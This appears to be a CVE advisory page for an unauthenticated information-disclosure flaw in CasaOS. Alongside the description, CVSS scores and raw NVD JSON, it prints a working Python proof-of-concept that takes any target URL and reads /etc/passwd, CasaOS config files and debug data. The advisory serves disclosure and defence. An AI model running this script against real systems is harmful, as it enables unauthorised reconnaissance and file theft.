Security Vulnerability Report
中文
CVE-2025-34171 CVSS 5.3 MEDIUM

CVE-2025-34171

Published: 2026-01-02 17:15:46
Last Modified: 2026-02-26 21:57:56
Source: [email protected]

Description

CasaOS versions up to and including 0.4.15 expose multiple unauthenticated endpoints that allow remote attackers to retrieve sensitive configuration files and system debug information. The /v1/users/image endpoint can be abused with a user-controlled path parameter to access files under /var/lib/casaos/1/, which reveals installed applications and configuration details. Additionally, /v1/sys/debug discloses host operating system, kernel, hardware, and storage information. The endpoints also return distinct error messages, enabling file existence enumeration of arbitrary paths on the underlying host filesystem. This information disclosure can be used for reconnaissance and to facilitate targeted follow-up attacks against services deployed on the host.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:* - VULNERABLE
CasaOS <= 0.4.15

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys import json # CVE-2025-34171 PoC - CasaOS Unauthenticated Information Disclosure # Target: CasaOS <= 0.4.15 def check_vulnerability(target_url): """ Check if target is vulnerable to CVE-2025-34171 """ results = { 'vulnerable_endpoints': [], 'disclosed_info': {} } # Test 1: System debug endpoint debug_url = f"{target_url.rstrip('/')}/v1/sys/debug" try: response = requests.get(debug_url, timeout=10, verify=False) if response.status_code == 200: results['vulnerable_endpoints'].append(debug_url) results['disclosed_info']['system_debug'] = response.json() print(f"[+] Vulnerable: {debug_url}") print(f"[+] System info disclosed: {json.dumps(response.json(), indent=2)}") except Exception as e: print(f"[-] Error accessing debug endpoint: {e}") # Test 2: File disclosure via image endpoint file_url = f"{target_url.rstrip('/')}/v1/users/image" test_paths = [ "/var/lib/casaos/1/apps.json", "/var/lib/casaos/1/config.json", "/etc/passwd" ] for path in test_paths: try: response = requests.get(file_url, params={'path': path}, timeout=10, verify=False) if response.status_code == 200: results['vulnerable_endpoints'].append(f"{file_url}?path={path}") results['disclosed_info'][path] = response.text[:500] # First 500 chars print(f"[+] File disclosure: {path}") print(f"[+] Content preview: {response.text[:200]}...") except Exception as e: print(f"[-] Error accessing file {path}: {e}") # Test 3: File enumeration enum_url = f"{target_url.rstrip('/')}/v1/users/image" test_exists = ["/etc/hosts", "/etc/passwd", "/nonexistent_file_12345.txt"] for test_path in test_exists: try: response = requests.get(enum_url, params={'path': test_path}, timeout=10, verify=False) print(f"[*] Path {test_path} - Status: {response.status_code}") except Exception as e: print(f"[-] Error: {e}") return results if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-34171.py <target_url>") print("Example: python cve-2025-34171.py http://192.168.1.100:8080") sys.exit(1) target = sys.argv[1] print(f"[*] Testing target: {target}") print(f"[*] CVE-2025-34171 - CasaOS Information Disclosure\n") results = check_vulnerability(target) if results['vulnerable_endpoints']: print(f"\n[!] Target is VULNERABLE") print(f"[!] Found {len(results['vulnerable_endpoints'])} vulnerable endpoints") else: print(f"\n[+] Target appears NOT vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-34171", "sourceIdentifier": "[email protected]", "published": "2026-01-02T17:15:45.897", "lastModified": "2026-02-26T21:57:55.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CasaOS versions up to and including 0.4.15 expose multiple unauthenticated endpoints that allow remote attackers to retrieve sensitive configuration files and system debug information. The /v1/users/image endpoint can be abused with a user-controlled path parameter to access files under /var/lib/casaos/1/, which reveals installed applications and configuration details. Additionally, /v1/sys/debug discloses host operating system, kernel, hardware, and storage information. The endpoints also return distinct error messages, enabling file existence enumeration of arbitrary paths on the underlying host filesystem. This information disclosure can be used for reconnaissance and to facilitate targeted follow-up attacks against services deployed on the host."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-497"}, {"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:icewhale:casaos:*:*:*:*:*:*:*:*", "versionEndIncluding": "0.4.15", "matchCriteriaId": "C36AE9E0-1CA3-4610-9F81-E3A49B547500"}]}]}], "references": [{"url": "https://casaos.zimaspace.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/IceWhaleTech/CasaOS", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/casaos-unauthenticated-file-and-debug-data-exposure", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.